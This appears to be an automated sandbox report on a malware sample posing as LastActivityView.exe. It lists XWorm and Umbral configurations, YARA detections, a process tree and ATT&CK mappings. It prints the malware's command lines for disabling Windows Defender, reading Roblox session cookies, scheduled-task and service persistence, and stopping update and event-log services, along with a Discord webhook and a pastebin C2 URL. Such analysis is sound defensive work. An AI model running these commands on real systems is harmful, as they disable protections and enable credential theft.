Analysis
  max time kernel: 132s
  max time network: 147s
  platform: windows7_x64
  resource: win7-20240215-en
  resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  submitted: 06/05/2024, 22:18
Behavioral tasks
  behavioral1: sample LastActivityView.exe, resource win7-20240215-en
  behavioral2: sample LastActivityView.exe, resource win10v2004-20240419-en
General
  Target: LastActivityView.exe
  Size: 89KB
  MD5: 499e35df562563babfff6a1d2ee71743
  SHA1: 7bece5115d9df1fa43b6a7a69f9574a498388960
  SHA256: 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
  SHA512: 2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377
  SSDEEP: 1536:XQol2xVvTS+KaYKvHUxErb2PPSUF2Q06yG2OklzG2OrSBR27KmhDWP:XQvVqaZsqrbeafQUmklzG2OrUyKdP
Malware Config

Extracted: xworm
  https://pastebin.com/raw/R8gFU5SX:123456789
  Install_directory: %ProgramData%
  install_file: {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  pastebin_url: https://pastebin.com/raw/R8gFU5SX

Extracted: umbral
  https://discord.com/api/webhooks/1237145706423123999/BQqwyjXaKt7KqCLA_iWguAde2fiNgpA36IvFL69WoxRB6yoYhMjlc7o80Exvew2DFX8M
Signatures

Detect Umbral payload (2 IoCs)
  yara_rule family_umbral: behavioral1/files/0x000700000001540d-44.dat
  yara_rule family_umbral: behavioral1/memory/2216-46-0x0000000000D20000-0x0000000000D60000-memory.dmp

Detect Xworm Payload (5 IoCs)
  yara_rule family_xworm: behavioral1/memory/1956-1-0x0000000000A60000-0x0000000000A7C000-memory.dmp
  yara_rule family_xworm: behavioral1/files/0x000e00000001480e-34.dat
  yara_rule family_xworm: behavioral1/memory/1004-36-0x0000000000280000-0x000000000029C000-memory.dmp
  yara_rule family_xworm: behavioral1/memory/1848-89-0x0000000000070000-0x000000000008C000-memory.dmp
  yara_rule family_xworm: behavioral1/memory/2152-141-0x00000000001D0000-0x00000000001EC000-memory.dmp

XMRig Miner payload (8 IoCs)
  yara_rule xmrig: behavioral1/memory/2992-N-0x0000000140000000-0x0000000140848000-memory.dmp for N = 130, 131, 133, 134, 135, 136, 137, 138

Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid/process: 2500 powershell.exe, 2936 powershell.exe, 2460 powershell.exe, 240 powershell.exe, 1716 powershell.exe, 2904 powershell.exe, 1780 powershell.exe

Creates new service(s) (2 TTPs)

Drops file in Drivers directory (1 IoCs)
  File opened for modification: C:\Windows\System32\drivers\etc\hosts (rjvwuf.exe)

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk (LastActivityView.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk (LastActivityView.exe)

Executes dropped EXE (6 IoCs)
  pid/process: 1004 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe, 2216 rjvwuf.exe, 1848 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe, 2852 haoqla.exe, 484 Process not Found, 332 gmstcccpdzbb.exe

Loads dropped DLL (5 IoCs)
  pid/process: 1956 LastActivityView.exe, 1956 LastActivityView.exe, 2672 taskmgr.exe, 2672 taskmgr.exe, 484 Process not Found

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

upx (yara_rule hits, 14 IoCs; signature heading lost in extraction)
  yara_rule upx: behavioral1/memory/2992-N-0x0000000140000000-0x0000000140848000-memory.dmp for N = 125, 126, 127, 128, 129, 130, 131, 133, 134, 135, 136, 137, 138, 139

Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str): \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" (LastActivityView.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 7 IoCs)
  flow/ioc: 6 pastebin.com, 7 pastebin.com, 8 2.tcp.eu.ngrok.io, 17 discord.com, 18 discord.com, 21 pastebin.com, 22 pastebin.com

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow/ioc: 15 ip-api.com, 4 ip-api.com

Drops file in System32 directory (2 IoCs)
  File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
  File opened for modification: C:\Windows\system32\MRT.exe (haoqla.exe)

Drops file in Windows directory (1 IoCs)
  File created: C:\Windows\wusa.lock (wusa.exe)

Launches sc.exe (14 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid/process (all sc.exe): 1432, 1472, 1836, 2100, 1852, 1456, 1704, 848, 1892, 2240, 1896, 584, 1200, 888

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (LastActivityView.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (LastActivityView.exe)

Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid/process: 2748 schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid/process: 1932 wmic.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (LastActivityView.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion (LastActivityView.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate (LastActivityView.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (LastActivityView.exe)

Modifies data under HKEY_USERS (2 IoCs)
  Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
  Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40532fa903a0da01 (powershell.exe)

Runs ping.exe (1 TTPs, 1 IoCs)
  pid/process: 2416 PING.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid/process: 1956 LastActivityView.exe

Suspicious behavior: EnumeratesProcesses (35 IoCs)
  pid/process: 2500 powershell.exe, 2936 powershell.exe, 2460 powershell.exe, 240 powershell.exe, 1956 LastActivityView.exe, 1716 powershell.exe, 2108 powershell.exe, 1428 powershell.exe, 1660 powershell.exe, 1524 powershell.exe, 2672 taskmgr.exe (x4), 2852 haoqla.exe, 2672 taskmgr.exe (x4), 2904 powershell.exe, 2852 haoqla.exe (x14), 332 gmstcccpdzbb.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token SeDebugPrivilege: 1956 LastActivityView.exe, 2500 powershell.exe, 2936 powershell.exe, 2460 powershell.exe, 240 powershell.exe, 1956 LastActivityView.exe, 1004 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe, 2216 rjvwuf.exe, 1716 powershell.exe, 2108 powershell.exe, 1428 powershell.exe, 1660 powershell.exe
  1668 wmic.exe (the full sequence appears twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  2196 wmic.exe (list cut at the 64-IoC limit): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege

Suspicious use of FindShellTrayWindow (20 IoCs)
  pid/process: 2672 taskmgr.exe (x20)

Suspicious use of SendNotifyMessage (20 IoCs)
  pid/process: 2672 taskmgr.exe (x20)

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid/process: 1956 LastActivityView.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Each "PID A wrote to memory of B" entry is recorded three times unless noted; procid_target in parentheses.
  1956 LastActivityView.exe -> 2500 (29), 2936 (31), 2460 (33), 240 (35), 2748 (37), 2216 (41), 2852 (68)
  2156 taskeng.exe -> 1004 (40), 1848 (67)
  2216 rjvwuf.exe -> 2372 (42), 1716 (44), 2108 (46), 1428 (48), 1660 (50), 1668 (52), 2196 (54), 2804 (56), 1524 (58), 1932 (60), 2400 (62)
  2400 cmd.exe -> 2416 (64)
  1912 cmd.exe -> 1696 (78), recorded once (list cut at the 64-IoC limit)

Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid/process: 2372 attrib.exe
Processes
(process tree; [n] is the depth in the tree)

[1] C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe  (PID 1956)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"
    signatures: Drops startup file; Loads dropped DLL; Adds Run key to start application; Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2500)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2936)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2460)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 240)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\schtasks.exe  (PID 2748)
      cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"
      signatures: Creates scheduled task(s)

  [2] C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe  (PID 2216)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"
      signatures: Drops file in Drivers directory; Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\attrib.exe  (PID 2372)
        cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"
        signatures: Views/modifies file attributes

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1716)
        cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2108)
        cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1428)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1660)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe  (PID 1668)
        cmdline: "wmic.exe" os get Caption
        signatures: Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe  (PID 2196)
        cmdline: "wmic.exe" computersystem get totalphysicalmemory
        signatures: Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe  (PID 2804)
        cmdline: "wmic.exe" csproduct get uuid

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1524)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        signatures: Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\System32\Wbem\wmic.exe  (PID 1932)
        cmdline: "wmic" path win32_VideoController get name
        signatures: Detects videocard installed

    [3] C:\Windows\system32\cmd.exe  (PID 2400)
        cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe" && pause
        signatures: Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\PING.EXE  (PID 2416)
          cmdline: ping localhost
          signatures: Runs ping.exe

  [2] C:\Users\Admin\AppData\Local\Temp\haoqla.exe  (PID 2852)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\haoqla.exe"
      signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 2904)
        cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        signatures: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\system32\cmd.exe  (PID 1912)
        cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        signatures: Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\wusa.exe  (PID 1696)
          cmdline: wusa /uninstall /kb:890830 /quiet /norestart
          signatures: Drops file in Windows directory

    [3] C:\Windows\system32\sc.exe  (PID 1892)
        cmdline: C:\Windows\system32\sc.exe stop UsoSvc
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 2240)
        cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 1896)
        cmdline: C:\Windows\system32\sc.exe stop wuauserv
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 584)
        cmdline: C:\Windows\system32\sc.exe stop bits
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 1432)
        cmdline: C:\Windows\system32\sc.exe stop dosvc
        signatures: Launches sc.exe

    [3] C:\Windows\system32\powercfg.exe  (PID 2896)
        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

    [3] C:\Windows\system32\powercfg.exe  (PID 528)
        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

    [3] C:\Windows\system32\powercfg.exe  (PID 904)
        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

    [3] C:\Windows\system32\powercfg.exe  (PID 2080)
        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

    [3] C:\Windows\system32\sc.exe  (PID 888)
        cmdline: C:\Windows\system32\sc.exe delete "XLZQHCLS"
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 1200)
        cmdline: C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 1456)
        cmdline: C:\Windows\system32\sc.exe stop eventlog
        signatures: Launches sc.exe

    [3] C:\Windows\system32\sc.exe  (PID 1472)
        cmdline: C:\Windows\system32\sc.exe start "XLZQHCLS"
        signatures: Launches sc.exe

[1] C:\Windows\system32\taskeng.exe  (PID 2156)
    cmdline: taskeng.exe {4B9DD97F-64F5-4011-84F4-6DDC103A5D24} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
    signatures: Suspicious use of WriteProcessMemory

  [2] C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe  (PID 1004)
      cmdline: C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
      signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

  [2] C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe  (PID 1848)
      cmdline: C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
      signatures: Executes dropped EXE

  [2] C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe  (PID 2152)
      cmdline: C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

[1] C:\Windows\system32\taskmgr.exe  (PID 2672)
    cmdline: "C:\Windows\system32\taskmgr.exe" /4
    signatures: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage

[1] C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe  (PID 332)
    cmdline: C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

  [2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 1780)
      cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      signatures: Command and Scripting Interpreter: PowerShell; Modifies data under HKEY_USERS

  [2] C:\Windows\system32\cmd.exe  (PID 3068)
      cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

    [3] C:\Windows\system32\wusa.exe  (PID 1648)
        cmdline: wusa /uninstall /kb:890830 /quiet /norestart

  [2] C:\Windows\system32\sc.exe  (PID 848)
      cmdline: C:\Windows\system32\sc.exe stop UsoSvc
      signatures: Launches sc.exe

  [2] C:\Windows\system32\sc.exe  (PID 1852)
      cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      signatures: Launches sc.exe

  [2] C:\Windows\system32\sc.exe  (PID 2100)
      cmdline: C:\Windows\system32\sc.exe stop wuauserv
      signatures: Launches sc.exe

  [2] C:\Windows\system32\sc.exe  (PID 1836)
      cmdline: C:\Windows\system32\sc.exe stop bits
      signatures: Launches sc.exe

  [2] C:\Windows\system32\sc.exe  (PID 1704)
      cmdline: C:\Windows\system32\sc.exe stop dosvc
      signatures: Launches sc.exe

  [2] C:\Windows\system32\powercfg.exe  (PID 2268)
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

  [2] C:\Windows\system32\powercfg.exe  (PID 2552)
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

  [2] C:\Windows\system32\powercfg.exe  (PID 756)
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

  [2] C:\Windows\system32\powercfg.exe  (PID 1928)
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

  [2] C:\Windows\system32\conhost.exe  (PID 1548)
      cmdline: C:\Windows\system32\conhost.exe

  [2] C:\Windows\system32\conhost.exe  (PID 2992)
      cmdline: conhost.exe
MITRE ATT&CK Enterprise v15
  Execution
    Command and Scripting Interpreter (1): PowerShell (1)
    Scheduled Task/Job (1)
    System Services (2): Service Execution (2)
  Persistence
    Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
    Create or Modify System Process (2): Windows Service (2)
    Scheduled Task/Job (1)
  Privilege Escalation
    Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
    Create or Modify System Process (2): Windows Service (2)
    Scheduled Task/Job (1)
Downloads